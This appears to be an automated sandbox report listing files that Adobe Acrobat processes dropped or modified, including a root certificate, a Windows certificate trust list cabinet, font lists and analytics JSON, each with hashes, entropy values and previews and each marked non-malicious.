                                                                                                        SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                                        SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                                        SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                                        Malicious:false
                                                                                                        Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                        Category:dropped
                                                                                                        Size (bytes):71954
                                                                                                        Entropy (8bit):7.996617769952133
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                        MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                        SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                        SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                        SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                        Malicious:false
                                                                                                        Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):192
                                                                                                        Entropy (8bit):2.7895108629891827
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:kkFklvEb3/tfllXlE/HT8k11h1NNX8RolJuRdxLlGB9lQRYwpDdt:kKjb3/eT88j7NMa8RdWBwRd
                                                                                                        MD5:A08AD49CE12D0A3A2C927268419AF0BE
                                                                                                        SHA1:68A160835E47E8784BAD6367C71F8C5D235075D0
                                                                                                        SHA-256:5E6D1F6D070758234DB7F9725C3A2AC62D97E93FEB311644675C222C3CD0E6C2
                                                                                                        SHA-512:DA71ECA77753A2AAB313E3D308B1E4C0300D8654F8CDBD3E5DF7035C2FF302B8D169C615528A17AA6124B111CAEB884DE25BC7A1D322E6B5BD7BDAC9B08D57BA
                                                                                                        Malicious:false
                                                                                                        Preview:p...... ..........G..b..(....................................................... ..........W.....7..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:modified
                                                                                                        Size (bytes):328
                                                                                                        Entropy (8bit):3.140290524202369
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:kK8L9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:VDnLNkPlE99SNxAhUe/3
                                                                                                        MD5:289B293375C38D916BBD128BD61A633B
                                                                                                        SHA1:EF97A52F7E3F63C9E161677B82E88B93A9EFF15C
                                                                                                        SHA-256:AA10D1E7A6731AF2B5DA36A86EB89CEEE8EFA6CCD75F61B50B3B26CDEA569AC1
                                                                                                        SHA-512:9D3FBCF3816658D42CEB94495D8E1564EAEAF072D83E55968DC1F0259893169591FAC4FC237DCCDB7CCC5EE15D483A00477DB4203504BAAA71457DAF3B3F44A2
                                                                                                        Malicious:false
                                                                                                        Preview:p...... .........q...b..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:PostScript document text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1233
                                                                                                        Entropy (8bit):5.233980037532449
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                                        MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                                        SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                                        SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                                        SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                                        Malicious:false
                                                                                                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:PostScript document text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1233
                                                                                                        Entropy (8bit):5.233980037532449
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                                        MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                                        SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                                        SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                                        SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                                        Malicious:false
                                                                                                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:PostScript document text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1233
                                                                                                        Entropy (8bit):5.233980037532449
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                                        MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                                        SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                                        SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                                        SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                                        Malicious:false
                                                                                                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:PostScript document text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):10880
                                                                                                        Entropy (8bit):5.214360287289079
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                                        MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                                        SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                                        SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                                        SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                                        Malicious:false
                                                                                                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:PostScript document text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):10880
                                                                                                        Entropy (8bit):5.214360287289079
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                                        MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                                        SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                                        SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                                        SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                                        Malicious:false
                                                                                                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):295
                                                                                                        Entropy (8bit):5.38218158320852
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HXXydHxjx6mJ0YifDDoAvJM3g98kUwPeUkwRe9:YvXKXXmRjx6mWrsGMbLUkee9
                                                                                                        MD5:6E659467E6FFBC567D6727FD58E97463
                                                                                                        SHA1:02869264BD34F9650C3869DD9AD380A80356000E
                                                                                                        SHA-256:F6ABEF3C95DDFDEF59EA6E1B39CB782BD51EF59B65DBABF71B0C73660454BDE0
                                                                                                        SHA-512:EBB481EF6AE8DBEAE5F209904AF1AAB3B0DA28CEE3C486F27FAFBA47C1EC0B8505D4ADE10C1BDEB2F7D70DE93A5D6D07CD3D25C95940B65D14274BB915690B1F
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"76ed20c8-077b-4210-9684-b405390d5d15","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1736612978469,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):294
                                                                                                        Entropy (8bit):5.333304924691612
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HXXydHxjx6mJ0YifDDoAvJfBoTfXpnrPeUkwRe9:YvXKXXmRjx6mWrsGWTfXcUkee9
                                                                                                        MD5:7A2D5065045649071356944B1702F908
                                                                                                        SHA1:9D568259201A8F92ACC5D016B4B78C986A9CEF5D
                                                                                                        SHA-256:6A48550547BDE81471EC77F351C1DA9E0CE970DAFFC3A09F6538493371F0B374
                                                                                                        SHA-512:D91561165E576A11D48FDC24CCCBD8CB4C1F76EE9CCD755892BABFE0A7188CB4107A2CA7D84C4534F70C163207E755027BF75EB0E4A16D14B1E1F9E46271F846
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"76ed20c8-077b-4210-9684-b405390d5d15","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1736612978469,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):294
                                                                                                        Entropy (8bit):5.31201113891849
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HXXydHxjx6mJ0YifDDoAvJfBD2G6UpnrPeUkwRe9:YvXKXXmRjx6mWrsGR22cUkee9
                                                                                                        MD5:546C45D2A19E0324C65F4DE9A22AA1C0
                                                                                                        SHA1:EF4B3DC374B3FB28BB176EEE7136AA4271986DE1
                                                                                                        SHA-256:752EB954220764D1ACB5FAE9144714FE192CC8F918BB4E303D51323A4F462941
                                                                                                        SHA-512:AEF3CB6978C2D8A8A6F812007471B08C331B4334CA472E2AD72E5AC0A1C18EE09D9C8351CD99CC720F09FEEC3621672753DF6D1B71089A65AB9C1C544FF5D670
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"76ed20c8-077b-4210-9684-b405390d5d15","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1736612978469,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):285
                                                                                                        Entropy (8bit):5.368938354582245
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HXXydHxjx6mJ0YifDDoAvJfPmwrPeUkwRe9:YvXKXXmRjx6mWrsGH56Ukee9
                                                                                                        MD5:F7ED7A1F172243327C05D7856179F820
                                                                                                        SHA1:196990459CC5F15857380D1E1808D45A2324695D
                                                                                                        SHA-256:A26F2ECA0602091718D024984C069175DA876751FE6EAE9887FB0EDE2E0522E4
                                                                                                        SHA-512:378FF893B345416F7A71F80616DF28301B3E7F610BEB94081C8170FCCD6980AD561C4B03F988D3D3010DE1D23C5A7986D627D31507068E8379FE26F7D2F5F92A
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"76ed20c8-077b-4210-9684-b405390d5d15","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1736612978469,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1123
                                                                                                        Entropy (8bit):5.695124871282222
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:Yv6XXmRd6prJpLgE9cQx8LennAvzBvkn0RCmK8czOCCSaS:Yv+c8prJhgy6SAFv5Ah8cv/B
                                                                                                        MD5:17A8AD960D54D89E6EC13BD282D3F1B9
                                                                                                        SHA1:73BFFE67460B3A4C80423C615FB0DE6E78102906
                                                                                                        SHA-256:EB71AC7CA2EE73C244D7DCCD3D92749991CD9EFA7EBA8C2A4F446084B35DA637
                                                                                                        SHA-512:7EA34EB97E7FAF4C624D9FB5811720FE6382ABA5396B1BDE0FCC712673689A364B0F3B82AAF55B24C2DEDA495A35152011D19499E6E8579AED0CBE4E771F1BD3
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"76ed20c8-077b-4210-9684-b405390d5d15","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1736612978469,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):289
                                                                                                        Entropy (8bit):5.319774397730054
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HXXydHxjx6mJ0YifDDoAvJf8dPeUkwRe9:YvXKXXmRjx6mWrsGU8Ukee9
                                                                                                        MD5:359BB5611A6F5C05321AE0E542397645
                                                                                                        SHA1:14EF5677242B30A2A1C644A5A8787F9A286019BB
                                                                                                        SHA-256:15C80458C1FD91051069374A6DAD24DCD94765DB0E3234139C824AFA875FF1F3
                                                                                                        SHA-512:094D028469EEE35B3E1AD55A86B2D94C086744D682BFB756E25BE9EC0FCAD614CFCEB7608B6308CD37FF4A95172879C4340D7E256BCC03449391DF31F3BDCB55
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"76ed20c8-077b-4210-9684-b405390d5d15","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1736612978469,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):292
                                                                                                        Entropy (8bit):5.3201968106901845
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HXXydHxjx6mJ0YifDDoAvJfQ1rPeUkwRe9:YvXKXXmRjx6mWrsGY16Ukee9
                                                                                                        MD5:39039D4F3AB3C03AC9EE404C6AF8954B
                                                                                                        SHA1:1536CC860A175597CBD1417B415542C8B97D0231
                                                                                                        SHA-256:91002AF9CAF3352F0FAB0012822A27F4473F84ABD714ACABB08CD7B7C843E160
                                                                                                        SHA-512:C16F99233A9F33AE8C01A576BE782D211FC74C25A5FCEBA32E5ECC780D707465A96CA4AE21423A52CF830D8EA7E4A142663D280E72583B70ABA26DAE7154B314
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"76ed20c8-077b-4210-9684-b405390d5d15","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1736612978469,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):289
                                                                                                        Entropy (8bit):5.328367182918792
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HXXydHxjx6mJ0YifDDoAvJfFldPeUkwRe9:YvXKXXmRjx6mWrsGz8Ukee9
                                                                                                        MD5:076F97220D06E0464E9EE3E200B8E577
                                                                                                        SHA1:6180EC8C5E2E3DA14DDD6440AF4D967B8003BE5E
                                                                                                        SHA-256:0450FDF7B93F0BF2DF26E23646CB024B9264773A4C85A17EAD26838337FABE17
                                                                                                        SHA-512:D71D4B0B7DE24D150D18F95266B8428386B9EC295F5BBD416C5BBB8EBE51AEC49AADF06523ACEF13CBBED2533B3862F7B9D3C4A8EFED62CDE280D05C28EF3A3B
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"76ed20c8-077b-4210-9684-b405390d5d15","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1736612978469,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):295
                                                                                                        Entropy (8bit):5.345895933592792
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HXXydHxjx6mJ0YifDDoAvJfzdPeUkwRe9:YvXKXXmRjx6mWrsGb8Ukee9
                                                                                                        MD5:3F52A030438ECEE63D0C2232B48B1625
                                                                                                        SHA1:5F3FE72806070CDAC175BBA1A30D05D8BF4AFD67
                                                                                                        SHA-256:6F28454289FD1B939F3CB58332E85CE93FE7FEF52409B4C51D3379458FE12374
                                                                                                        SHA-512:F9354F5BF2613FEDBC82A99115B57E83D7A482368FB16E44B64D8AAA4EBA339A23CD1333251B66DBD0DE37BD4FC88A2BC9C4AC8802CEA096B5D8021BA343AC73
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"76ed20c8-077b-4210-9684-b405390d5d15","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1736612978469,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
